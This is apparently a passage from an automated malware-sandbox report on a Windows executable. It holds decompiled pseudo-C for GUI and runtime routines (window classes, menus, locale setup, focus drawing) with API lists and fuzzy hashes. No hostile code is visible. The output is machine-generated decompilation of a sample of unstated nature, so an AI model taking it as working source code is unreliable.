                                                                                						if(_t48 != 0) {
                                                                                							UnregisterClassA( &_v68, _v108.hInstance);
                                                                                						}
                                                                                						_v108.lpfnWndProc = E004324CC;
                                                                                						_v108.lpszClassName =  &_v68;
                                                                                						if(RegisterClassA( &_v108) == 0) {
                                                                                							E0040B264(_t83, _t84, _t98, _t100);
                                                                                						}
                                                                                					}
                                                                                					 *0x46b8d0 = _t100;
                                                                                					_t85 =  *_t100;
                                                                                					 *((intOrPtr*)( *_t100 + 0x9c))();
                                                                                					if( *((intOrPtr*)(_t100 + 0x180)) == 0) {
                                                                                						E0040B264(_t83, _t85, _t98, _t100);
                                                                                					}
                                                                                					E00408D84( *((intOrPtr*)(_t100 + 0x64)));
                                                                                					 *((intOrPtr*)(_t100 + 0x64)) = 0;
                                                                                					E0043C024(_t100);
                                                                                					E00436848(_t100, E0041EB60( *((intOrPtr*)(_t100 + 0x68)), _t83, _t85), 0x30, 1);
                                                                                					_t117 =  *((char*)(_t100 + 0x5c));
                                                                                					if( *((char*)(_t100 + 0x5c)) != 0) {
                                                                                						E004037B0(_t100, _t117);
                                                                                					}
                                                                                					_pop(_t93);
                                                                                					 *[fs:eax] = _t93;
                                                                                					_push(0x438fb6);
                                                                                					return E00404320( &_v196);
                                                                                				} else {
                                                                                					_t83 =  *((intOrPtr*)(__eax + 4));
                                                                                					if(_t83 == 0 || ( *(_t83 + 0x1c) & 0x00000002) == 0) {
                                                                                						L6:
                                                                                						_v192 =  *((intOrPtr*)(_t100 + 8));
                                                                                						_v188 = 0xb;
                                                                                						_t75 =  *0x486ca0; // 0x41cc64
                                                                                						E00406520(_t75,  &_v196);
                                                                                						_t84 = _v196;
                                                                                						E0040A0EC(_t83, _v196, 1, _t98, _t100, 0,  &_v192);
                                                                                						E00403D80();
                                                                                					} else {
                                                                                						_t97 =  *0x4317f8; // 0x431844
                                                                                						if(E00403740(_t83, _t97) == 0) {
                                                                                							goto L6;
                                                                                						}
                                                                                						_v116 = E0043BD14(_t83);
                                                                                					}
                                                                                					goto L7;
                                                                                				}
                                                                                			}




















                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Class$InfoRegisterUnregister
                                                                                • String ID: @
                                                                                • API String ID: 3749476976-2766056989
                                                                                • Opcode ID: 21dd18e9953e48b37a4c7903d912f91da23f7b871cb6d6bdeab43af77ca17acd
                                                                                • Instruction ID: 9ca51f5f29ae1eb14152c1338e28f16d362e04c9e494997458acfa82f7e2cf98
                                                                                • Opcode Fuzzy Hash: 21dd18e9953e48b37a4c7903d912f91da23f7b871cb6d6bdeab43af77ca17acd
                                                                                • Instruction Fuzzy Hash: 81416D70A003088BDB21EB65C841B9AB7FAAF48304F0445AEE549E7391DB78AD44CB59
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 65%
                                                                                			E004099B8(void* __ebx, void* __edi, void* __esi) {
                                                                                				int _v8;
                                                                                				signed int _v12;
                                                                                				char _v16;
                                                                                				char _v20;
                                                                                				char _v24;
                                                                                				char _v28;
                                                                                				void* _t53;
                                                                                				void* _t54;
                                                                                				intOrPtr _t80;
                                                                                				void* _t83;
                                                                                				void* _t84;
                                                                                				void* _t86;
                                                                                				void* _t87;
                                                                                				intOrPtr _t90;
                                                                                
                                                                                				_t89 = _t90;
                                                                                				_push(0);
                                                                                				_push(0);
                                                                                				_push(0);
                                                                                				_push(0);
                                                                                				_push(0);
                                                                                				_push(0);
                                                                                				_push(_t90);
                                                                                				_push(0x409acb);
                                                                                				_push( *[fs:eax]);
                                                                                				 *[fs:eax] = _t90;
                                                                                				_v8 = GetThreadLocale();
                                                                                				_t53 = 1;
                                                                                				_t86 = 0x487758;
                                                                                				_t83 = 0x487788;
                                                                                				do {
                                                                                					_t3 = _t53 + 0x44; // 0x45
                                                                                					E0040997C(_t3 - 1, _t53 - 1,  &_v16, 0xb, _t89);
                                                                                					E00404374(_t86, _v16);
                                                                                					_t6 = _t53 + 0x38; // 0x39
                                                                                					E0040997C(_t6 - 1, _t53 - 1,  &_v20, 0xb, _t89);
                                                                                					E00404374(_t83, _v20);
                                                                                					_t53 = _t53 + 1;
                                                                                					_t83 = _t83 + 4;
                                                                                					_t86 = _t86 + 4;
                                                                                				} while (_t53 != 0xd);
                                                                                				_t54 = 1;
                                                                                				_t87 = 0x4877b8;
                                                                                				_t84 = 0x4877d4;
                                                                                				do {
                                                                                					_t8 = _t54 + 5; // 0x6
                                                                                					asm("cdq");
                                                                                					_v12 = _t8 % 7;
                                                                                					E0040997C(_v12 + 0x31, _t54 - 1,  &_v24, 6, _t89);
                                                                                					E00404374(_t87, _v24);
                                                                                					E0040997C(_v12 + 0x2a, _t54 - 1,  &_v28, 6, _t89);
                                                                                					E00404374(_t84, _v28);
                                                                                					_t54 = _t54 + 1;
                                                                                					_t84 = _t84 + 4;
                                                                                					_t87 = _t87 + 4;
                                                                                				} while (_t54 != 8);
                                                                                				_pop(_t80);
                                                                                				 *[fs:eax] = _t80;
                                                                                				_push(E00409AD2);
                                                                                				return E00404344( &_v28, 4);
                                                                                			}

















                                                                                APIs
                                                                                • GetThreadLocale.KERNEL32(00000000,00409ACB,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004099D4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                Similarity
                                                                                • API ID: LocaleThread
                                                                                • String ID: Dv@$|v@$u@
                                                                                • API String ID: 635194068-2345670339
                                                                                • Opcode ID: 354055b3c218b326d5e2525807c87160312728312255f27513c187d7af9ec646
                                                                                • Instruction ID: 09a08a330bd4a45439277aa33b1eaf094ed5bc7a83b6c8959b739365ddb57b32
                                                                                • Opcode Fuzzy Hash: 354055b3c218b326d5e2525807c87160312728312255f27513c187d7af9ec646
                                                                                • Instruction Fuzzy Hash: B431B6B1B001086BDB00DA55C891EAF77A9D789314F61843BEA09E7381D73DED4187A9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 75%
                                                                                			E00455CC0(char __eax, void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                				char _v8;
                                                                                				char _v9;
                                                                                				char _v16;
                                                                                				char _v20;
                                                                                				intOrPtr _t36;
                                                                                				long _t41;
                                                                                				intOrPtr _t51;
                                                                                				void* _t55;
                                                                                				intOrPtr _t66;
                                                                                				intOrPtr* _t67;
                                                                                				intOrPtr _t68;
                                                                                				void* _t74;
                                                                                				void* _t75;
                                                                                				intOrPtr _t76;
                                                                                
                                                                                				_t74 = _t75;
                                                                                				_t76 = _t75 + 0xfffffff0;
                                                                                				_v16 = 0;
                                                                                				_v20 = 0;
                                                                                				_v8 = __eax;
                                                                                				_push(_t74);
                                                                                				_push(0x455dce);
                                                                                				_push( *[fs:eax]);
                                                                                				 *[fs:eax] = _t76;
                                                                                				_t4 =  &_v8; // 0x455438
                                                                                				_t55 = E00455C3C( *_t4);
                                                                                				_t5 =  &_v8; // 0x455438
                                                                                				if( *((char*)( *_t5 + 0x88)) != 0) {
                                                                                					_t7 =  &_v8; // 0x455438
                                                                                					_t51 =  *_t7;
                                                                                					_t79 =  *((intOrPtr*)(_t51 + 0x48));
                                                                                					if( *((intOrPtr*)(_t51 + 0x48)) == 0) {
                                                                                						_t9 =  &_v8; // 0x455438
                                                                                						E00456214( *_t9);
                                                                                					}
                                                                                				}
                                                                                				E00453DC8(_t55,  &_v20);
                                                                                				E00432818(_v20, 0,  &_v16, _t79);
                                                                                				_t36 =  *0x487bfc; // 0x2291310
                                                                                				E00455E7C(_t36, _v16, _t79);
                                                                                				_v9 = 1;
                                                                                				_push(_t74);
                                                                                				_push(0x455d77);
                                                                                				_push( *[fs:eax]);
                                                                                				 *[fs:eax] = _t76;
                                                                                				_t15 =  &_v8; // 0x455438
                                                                                				if( *((short*)( *_t15 + 0xea)) != 0) {
                                                                                					_t18 =  &_v8; // 0x455438
                                                                                					 *((intOrPtr*)( *_t18 + 0xe8))();
                                                                                				}
                                                                                				if(_v9 != 0) {
                                                                                					E00455BD8();
                                                                                				}
                                                                                				_pop(_t66);
                                                                                				 *[fs:eax] = _t66;
                                                                                				_t41 = GetCurrentThreadId();
                                                                                				_t67 =  *0x486dcc; // 0x487030
                                                                                				if(_t41 ==  *_t67 && E0041B790() != 0) {
                                                                                					_v9 = 0;
                                                                                				}
                                                                                				if(_v9 != 0) {
                                                                                					WaitMessage();
                                                                                				}
                                                                                				_pop(_t68);
                                                                                				 *[fs:eax] = _t68;
                                                                                				_push(E00455DD5);
                                                                                				return E00404344( &_v20, 2);
                                                                                			}

















                                                                                0x00455dae
                                                                                0x00455db5
                                                                                0x00455db8
                                                                                0x00455dbb
                                                                                0x00455dcd

                                                                                APIs
                                                                                  • Part of subcall function 00455C3C: GetCursorPos.USER32 ref: 00455C45
                                                                                • GetCurrentThreadId.KERNEL32 ref: 00455D8C
                                                                                • WaitMessage.USER32(00000000,00455DCE,?,?,?,0046AE10), ref: 00455DAE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: CurrentCursorMessageThreadWait
                                                                                • String ID: 0pH$8TE
                                                                                • API String ID: 535285469-2347222379
                                                                                • Opcode ID: 33e272798ce47cd420cc52f89068bdd1ce196a76f822225d5e692daa21e4ed6f
                                                                                • Instruction ID: ef179845760a388f2d3b94f2e4396c7f7e61d99bb3ed3a3471b4b2a0e5122e17
                                                                                • Opcode Fuzzy Hash: 33e272798ce47cd420cc52f89068bdd1ce196a76f822225d5e692daa21e4ed6f
                                                                                • Instruction Fuzzy Hash: FE31A430A04648EFDB01DB95D855BAEB7F5EB45305F6184BAEC00A7392D7786E0CCB18
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 93%
                                                                                			E00448B18(intOrPtr* __eax) {
                                                                                				struct tagMENUITEMINFOA _v128;
                                                                                				intOrPtr _v132;
                                                                                				int _t16;
                                                                                				intOrPtr* _t29;
                                                                                				struct HMENU__* _t36;
                                                                                				MENUITEMINFOA* _t37;
                                                                                
                                                                                				_t37 =  &_v128;
                                                                                				_t29 = __eax;
                                                                                				_t16 =  *0x486dd0; // 0x4877f0
                                                                                				if( *((char*)(_t16 + 0xd)) != 0 &&  *((intOrPtr*)(__eax + 0x38)) != 0) {
                                                                                					_t36 =  *((intOrPtr*)( *__eax + 0x34))();
                                                                                					_t37->cbSize = 0x2c;
                                                                                					_v132 = 0x10;
                                                                                					_v128.hbmpUnchecked =  &(_v128.cch);
                                                                                					_v128.dwItemData = 0x50;
                                                                                					_t16 = GetMenuItemInfoA(_t36, 0, 0xffffffff, _t37);
                                                                                					if(_t16 != 0) {
                                                                                						_t16 = E00448E9C(_t29);
                                                                                						asm("sbb edx, edx");
                                                                                						if(_t16 != (_v128.cbSize & 0x00006000) + 1) {
                                                                                							_v128.cbSize = ((E00448E9C(_t29) & 0x0000007f) << 0x0000000d) + ((E00448E9C(_t29) & 0x0000007f) << 0x0000000d) * 0x00000002 | _v128 & 0xffff9fff;
                                                                                							_v132 = 0x10;
                                                                                							_t16 = SetMenuItemInfoA(_t36, 0, 0xffffffff, _t37);
                                                                                							if(_t16 != 0) {
                                                                                								return DrawMenuBar( *(_t29 + 0x38));
                                                                                							}
                                                                                						}
                                                                                					}
                                                                                				}
                                                                                				return _t16;
                                                                                			}










                                                                                APIs
                                                                                • GetMenuItemInfoA.USER32 ref: 00448B66
                                                                                • SetMenuItemInfoA.USER32(00000000,00000000,000000FF), ref: 00448BB8
                                                                                • DrawMenuBar.USER32(00000000,00000000,00000000,000000FF), ref: 00448BC5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: Menu$InfoItem$Draw
                                                                                • String ID: P
                                                                                • API String ID: 3227129158-3110715001
                                                                                • Opcode ID: eaf55a4eab559924dae5380356c89efe65fe6fcff4096a5dc4b7a8903ee41b04
                                                                                • Instruction ID: 8907f95ecabcbea213e89b25aadd05f800e1c1858eab99648a633ad0099d5281
                                                                                • Opcode Fuzzy Hash: eaf55a4eab559924dae5380356c89efe65fe6fcff4096a5dc4b7a8903ee41b04
                                                                                • Instruction Fuzzy Hash: EA118FB0605210AFE3109B29CC81B5E76D5EB84358F148A2EF0A4DB3D5DBB9D885C78A
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 76%
                                                                                			E00425BB8(void* __ebx, void* __ecx, void* __edx) {
                                                                                				intOrPtr _t3;
                                                                                				intOrPtr _t5;
                                                                                				intOrPtr _t7;
                                                                                				intOrPtr _t10;
                                                                                				intOrPtr _t12;
                                                                                				intOrPtr _t14;
                                                                                				intOrPtr _t16;
                                                                                				intOrPtr _t18;
                                                                                				void* _t20;
                                                                                				void* _t27;
                                                                                				intOrPtr _t33;
                                                                                				intOrPtr _t34;
                                                                                				intOrPtr _t35;
                                                                                				intOrPtr _t38;
                                                                                
                                                                                				_t27 = __ecx;
                                                                                				_push(_t38);
                                                                                				_push(0x425c81);
                                                                                				_push( *[fs:eax]);
                                                                                				 *[fs:eax] = _t38;
                                                                                				 *0x487a2c =  *0x487a2c + 1;
                                                                                				if( *0x487a2c == 0) {
                                                                                					_t3 =  *0x487a84; // 0x2290b50
                                                                                					E004035B4(_t3);
                                                                                					_t5 =  *0x46b784; // 0x0
                                                                                					E004035B4(_t5);
                                                                                					_t7 =  *0x46b780; // 0x0
                                                                                					E004035B4(_t7);
                                                                                					E00422B9C(__ebx, _t27);
                                                                                					_t10 =  *0x46b788; // 0x2290b74
                                                                                					E004035B4(_t10);
                                                                                					_t12 =  *0x487a80; // 0x2290bb0
                                                                                					E004035B4(_t12);
                                                                                					_t14 =  *0x487a74; // 0x2290ad8
                                                                                					E004035B4(_t14);
                                                                                					_t16 =  *0x487a78; // 0x2290b00
                                                                                					E004035B4(_t16);
                                                                                					_t18 =  *0x487a7c; // 0x2290b28
                                                                                					E004035B4(_t18);
                                                                                					_t20 =  *0x487a28; // 0x510805d2
                                                                                					DeleteObject(_t20);
                                                                                					_push(0x487a44);
                                                                                					L00406838();
                                                                                					_push(0x487a5c);
                                                                                					L00406838();
                                                                                					_t34 =  *0x412938; // 0x41293c
                                                                                					E00404E00(0x46b6a0, 0x12, _t34);
                                                                                					_t35 =  *0x412938; // 0x41293c
                                                                                					E00404E00(0x46b518, 0x31, _t35);
                                                                                				}
                                                                                				_pop(_t33);
                                                                                				 *[fs:eax] = _t33;
                                                                                				_push(0x425c88);
                                                                                				return 0;
                                                                                			}


















                                                                                APIs
                                                                                • DeleteObject.GDI32(510805D2), ref: 00425C30
                                                                                • RtlDeleteCriticalSection.KERNEL32(00487A44,510805D2,00000000,00425C81), ref: 00425C3A
                                                                                • RtlDeleteCriticalSection.KERNEL32(00487A5C,00487A44,510805D2,00000000,00425C81), ref: 00425C44
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: Delete$CriticalSection$Object
                                                                                • String ID: <)A
                                                                                • API String ID: 378701848-2544708363
                                                                                • Opcode ID: ee513705faa84d92f2094eeb87fc4e5f7c42333d3502ee9816f9952387714f7f
                                                                                • Instruction ID: 22795a93df35987cad2729373931b2b91126da6fc89bb47129e9437559cd03b6
                                                                                • Opcode Fuzzy Hash: ee513705faa84d92f2094eeb87fc4e5f7c42333d3502ee9816f9952387714f7f
                                                                                • Instruction Fuzzy Hash: 08013CB03141009BC715FF26ED5290D7768E744705360487BF000A7BB2DA7CDE518B8D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E0040B34C() {
                                                                                				_Unknown_base(*)()* _t1;
                                                                                				struct HINSTANCE__* _t3;
                                                                                
                                                                                				_t1 = GetModuleHandleA("kernel32.dll");
                                                                                				_t3 = _t1;
                                                                                				if(_t3 != 0) {
                                                                                					_t1 = GetProcAddress(_t3, "GetDiskFreeSpaceExA");
                                                                                					 *0x46b0e4 = _t1;
                                                                                				}
                                                                                				if( *0x46b0e4 == 0) {
                                                                                					 *0x46b0e4 = E00408ACC;
                                                                                					return E00408ACC;
                                                                                				}
                                                                                				return _t1;
                                                                                			}






                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,?,0040C025,00000000,0040C038), ref: 0040B352
                                                                                • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 0040B363
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: AddressHandleModuleProc
                                                                                • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                                • API String ID: 1646373207-3712701948
                                                                                • Opcode ID: 7a2e7a6ad3db9ec5b6a148488899aea6f251dff6c7e78eecb5d69a20a1fe6600
                                                                                • Instruction ID: a513fbbfe291899ee6294738837c62684835be1d612828af4dfd11c86fef4dc6
                                                                                • Opcode Fuzzy Hash: 7a2e7a6ad3db9ec5b6a148488899aea6f251dff6c7e78eecb5d69a20a1fe6600
                                                                                • Instruction Fuzzy Hash: 6BD05EA17023026ED300ABA05D8160F2544D300304B21803BE902B52D2E7BC885146CE
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 95%
                                                                                			E00463678(char __eax, intOrPtr __ecx, void* __edx, void* _a8) {
                                                                                				char _v8;
                                                                                				intOrPtr _v12;
                                                                                				struct tagRECT _v28;
                                                                                				intOrPtr _v32;
                                                                                				struct HWND__* _v36;
                                                                                				signed short _v38;
                                                                                				char _v39;
                                                                                				char _v40;
                                                                                				signed int _v52;
                                                                                				void* __edi;
                                                                                				void* __ebp;
                                                                                				void* _t93;
                                                                                				struct HWND__* _t94;
                                                                                				signed int _t99;
                                                                                				signed int _t100;
                                                                                				signed int _t123;
                                                                                				struct HWND__* _t125;
                                                                                				signed int _t127;
                                                                                				signed int _t129;
                                                                                				void* _t131;
                                                                                				struct HWND__* _t144;
                                                                                				struct HWND__* _t145;
                                                                                				intOrPtr _t148;
                                                                                				void* _t152;
                                                                                				struct HWND__* _t153;
                                                                                				intOrPtr _t155;
                                                                                				intOrPtr _t159;
                                                                                				struct HWND__* _t196;
                                                                                				struct HWND__* _t200;
                                                                                				long _t209;
                                                                                				struct HWND__** _t212;
                                                                                				void* _t213;
                                                                                
                                                                                				_t180 = __ecx;
                                                                                				asm("movsd");
                                                                                				asm("movsd");
                                                                                				asm("movsd");
                                                                                				asm("movsd");
                                                                                				_v32 = __ecx;
                                                                                				_v8 = __eax;
                                                                                				_t212 =  &_v8;
                                                                                				_t93 = E00460E0C( *((intOrPtr*)( *_t212 + 0x29c)));
                                                                                				_t214 =  *((intOrPtr*)(_t93 + 8));
                                                                                				if( *((intOrPtr*)(_t93 + 8)) == 0) {
                                                                                					E0041F338( *((intOrPtr*)( *((intOrPtr*)( *_t212 + 0x208)) + 0x14)), __ecx,  *((intOrPtr*)( *_t212 + 0x70)),  &_v28, _t213, _t214);
                                                                                					return E0041F9D0( *((intOrPtr*)( *_t212 + 0x208)),  &_v28);
                                                                                				}
                                                                                				_t94 =  *_t212;
                                                                                				__eflags =  *((char*)(_t94 + 0x2e8)) - 1;
                                                                                				if( *((char*)(_t94 + 0x2e8)) != 1) {
                                                                                					L10:
                                                                                					_t209 = _v28.left;
                                                                                					_v36 = E004631E0( *_t212, _v32);
                                                                                					_t99 = _v28.bottom - _v28.top -  *((intOrPtr*)( *_t212 + 0x2b0));
                                                                                					__eflags = _t99;
                                                                                					_t100 = _t99 >> 1;
                                                                                					if(__eflags < 0) {
                                                                                						asm("adc eax, 0x0");
                                                                                					}
                                                                                					_v52 = _t100;
                                                                                					_t173 =  *((intOrPtr*)( *_t212 + 0x208));
                                                                                					E0041FCC0( *((intOrPtr*)( *_t212 + 0x208)));
                                                                                					E0041F338( *((intOrPtr*)( *((intOrPtr*)( *_t212 + 0x208)) + 0x14)), _t180,  *((intOrPtr*)( *_t212 + 0x70)), _t209, _t213, __eflags);
                                                                                					E0041F9D0( *((intOrPtr*)( *_t212 + 0x208)),  &_v28);
                                                                                					_v12 = E0041FC00(_t173,  *((intOrPtr*)(_v36 + 8))) + 1;
                                                                                					__eflags =  *( *_t212 + 0x22c) - _v32;
                                                                                					if(__eflags == 0) {
                                                                                						E0041F338( *((intOrPtr*)(_t173 + 0x14)), _t180, 0x8000000d, _t209, _t213, __eflags);
                                                                                						E0041EB4C( *((intOrPtr*)(_t173 + 0xc)), 0x8000000e);
                                                                                					}
                                                                                					_v40 =  *((intOrPtr*)(_v36 + 0x18));
                                                                                					_v39 = E004617E4(_v36);
                                                                                					_v38 = E00460EF8(_v36);
                                                                                					_t123 =  *( *_t212 + 0x2e0) & 0x000000ff;
                                                                                					__eflags = _t123 - 5;
                                                                                					if(__eflags > 0) {
                                                                                						L22:
                                                                                						_t125 =  *( *_t212 + 0x22c);
                                                                                						__eflags = _t125 - _v32;
                                                                                						if(_t125 != _v32) {
                                                                                							goto L35;
                                                                                						}
                                                                                						_t125 = _v36;
                                                                                						__eflags =  *(_t125 + 8);
                                                                                						if( *(_t125 + 8) == 0) {
                                                                                							goto L35;
                                                                                						}
                                                                                						_t127 =  *( *_t212 + 0x234);
                                                                                						_v28.left = _t209 + _t127 * ((_v38 & 0x0000ffff) - 1);
                                                                                						_t196 =  *_t212;
                                                                                						__eflags =  *((char*)(_t196 + 0x2e0)) - 4;
                                                                                						if( *((char*)(_t196 + 0x2e0)) >= 4) {
                                                                                							_v28.left = _v28.left - _v52;
                                                                                							_t200 =  *_t212;
                                                                                							__eflags =  *(_t200 + 0x2e9) & 0x00000001;
                                                                                							if(( *(_t200 + 0x2e9) & 0x00000001) != 0) {
                                                                                								_t76 =  &_v28;
                                                                                								 *_t76 = _v28.left + _t127;
                                                                                								__eflags =  *_t76;
                                                                                							}
                                                                                						}
                                                                                						_t129 =  *( *_t212 + 0x2e0);
                                                                                						__eflags = _t129;
                                                                                						if(_t129 != 0) {
                                                                                							__eflags = _t129 - 4;
                                                                                							if(_t129 != 4) {
                                                                                								_t80 =  &_v28;
                                                                                								 *_t80 = _v28.left +  *( *_t212 + 0x234);
                                                                                								__eflags =  *_t80;
                                                                                							}
                                                                                						}
                                                                                						__eflags = _t129 - 3;
                                                                                						if(_t129 == 3) {
                                                                                							_t83 =  &_v28;
                                                                                							 *_t83 = _v28.left +  *( *_t212 + 0x234);
                                                                                							__eflags =  *_t83;
                                                                                						}
                                                                                						_t131 = E0043BD14( *_t212);
                                                                                						_t125 = GetFocus();
                                                                                						__eflags = _t131 - _t125;
                                                                                						if(_t131 != _t125) {
                                                                                							goto L35;
                                                                                						} else {
                                                                                							_t125 =  *_t212;
                                                                                							__eflags =  *(_t125 + 0x2e9) & 0x00000002;
                                                                                							if(( *(_t125 + 0x2e9) & 0x00000002) == 0) {
                                                                                								goto L35;
                                                                                							}
                                                                                							return DrawFocusRect(E0041FDC4( *((intOrPtr*)( *_t212 + 0x208))),  &_v28);
                                                                                						}
                                                                                					} else {
                                                                                						switch( *((intOrPtr*)(_t123 * 4 +  &M00463858))) {
                                                                                							case 0:
                                                                                								E00463250(_t213);
                                                                                								goto L22;
                                                                                							case 1:
                                                                                								__eax = E0046345C(__edi, __esi, __ebp);
                                                                                								goto L22;
                                                                                							case 2:
                                                                                								__eax = E004633AC(__edi, __ebp);
                                                                                								goto L22;
                                                                                							case 3:
                                                                                								__eax = E004632A0(__edi, __esi, __ebp);
                                                                                								goto L22;
                                                                                							case 4:
                                                                                								__eax = E0046350C(__edi, __esi, __eflags, __ebp);
                                                                                								goto L22;
                                                                                							case 5:
                                                                                								__eax = E00463594(__edi, __eflags, __ebp);
                                                                                								goto L22;
                                                                                						}
                                                                                					}
                                                                                				} else {
                                                                                					_t144 =  *_t212;
                                                                                					__eflags =  *((short*)(_t144 + 0x2f2));
                                                                                					if( *((short*)(_t144 + 0x2f2)) == 0) {
                                                                                						goto L10;
                                                                                					}
                                                                                					_t145 =  *_t212;
                                                                                					__eflags =  *((intOrPtr*)(_t145 + 0x22c)) - _v32;
                                                                                					if( *((intOrPtr*)(_t145 + 0x22c)) != _v32) {
                                                                                						_t148 =  *0x463968; // 0x0
                                                                                						return  *((intOrPtr*)( *_t212 + 0x2f0))(_t148,  &_v28);
                                                                                					}
                                                                                					_t152 = E0043BD14( *_t212);
                                                                                					_t153 = GetFocus();
                                                                                					__eflags = _t152 - _t153;
                                                                                					if(_t152 != _t153) {
                                                                                						_t155 =  *0x463964; // 0x1
                                                                                						return  *((intOrPtr*)( *_t212 + 0x2f0))(_t155,  &_v28);
                                                                                					}
                                                                                					_t159 =  *0x463960; // 0x11
                                                                                					 *((intOrPtr*)( *_t212 + 0x2f0))(_t159,  &_v28);
                                                                                					_t125 =  *_t212;
                                                                                					__eflags =  *(_t125 + 0x2e9) & 0x00000002;
                                                                                					if(( *(_t125 + 0x2e9) & 0x00000002) == 0) {
                                                                                						L35:
                                                                                						return _t125;
                                                                                					}
                                                                                					return DrawFocusRect(E0041FDC4( *((intOrPtr*)( *_t212 + 0x208))),  &_v28);
                                                                                				}
                                                                                			}

                                                                                0x00000000
                                                                                0x0046378d
                                                                                0x004636f9
                                                                                0x00463700
                                                                                0x00463705
                                                                                0x00463707
                                                                                0x00463756
                                                                                0x00000000
                                                                                0x0046376a
                                                                                0x0046370d
                                                                                0x00463721
                                                                                0x00463727
                                                                                0x00463729
                                                                                0x00463730
                                                                                0x0046395c
                                                                                0x0046395c
                                                                                0x0046395c
                                                                                0x00000000
                                                                                0x00463748

                                                                                APIs
                                                                                • GetFocus.USER32 ref: 00463700
                                                                                • DrawFocusRect.USER32 ref: 00463748
                                                                                  • Part of subcall function 0041F9D0: FillRect.USER32 ref: 0041F9F8
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
